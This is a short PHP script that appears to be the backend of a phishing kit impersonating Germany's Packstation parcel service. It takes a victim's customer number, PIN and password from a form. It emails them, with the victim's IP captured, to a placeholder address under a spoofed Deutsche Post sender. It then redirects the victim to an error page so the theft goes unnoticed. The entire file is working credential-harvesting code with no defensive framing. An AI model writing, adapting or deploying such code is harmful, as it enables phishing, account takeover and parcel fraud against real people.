<?php

$username = $_POST['kundennummer'];

$pin = $_POST['pin'];

$passwort = $_POST['passwort'];

$ip = $_SERVER["REMOTE_ADDR"];


$subj = "Packstation Daten";

$msg = "Kundennummer: $username\n PIN: $pin\n Passwort: $passwort\n";

$from = "From: Post<info@packstation.de>";

mail("deineemail@web.de", $subj, $msg, $from);

header("Location: error.html");

?>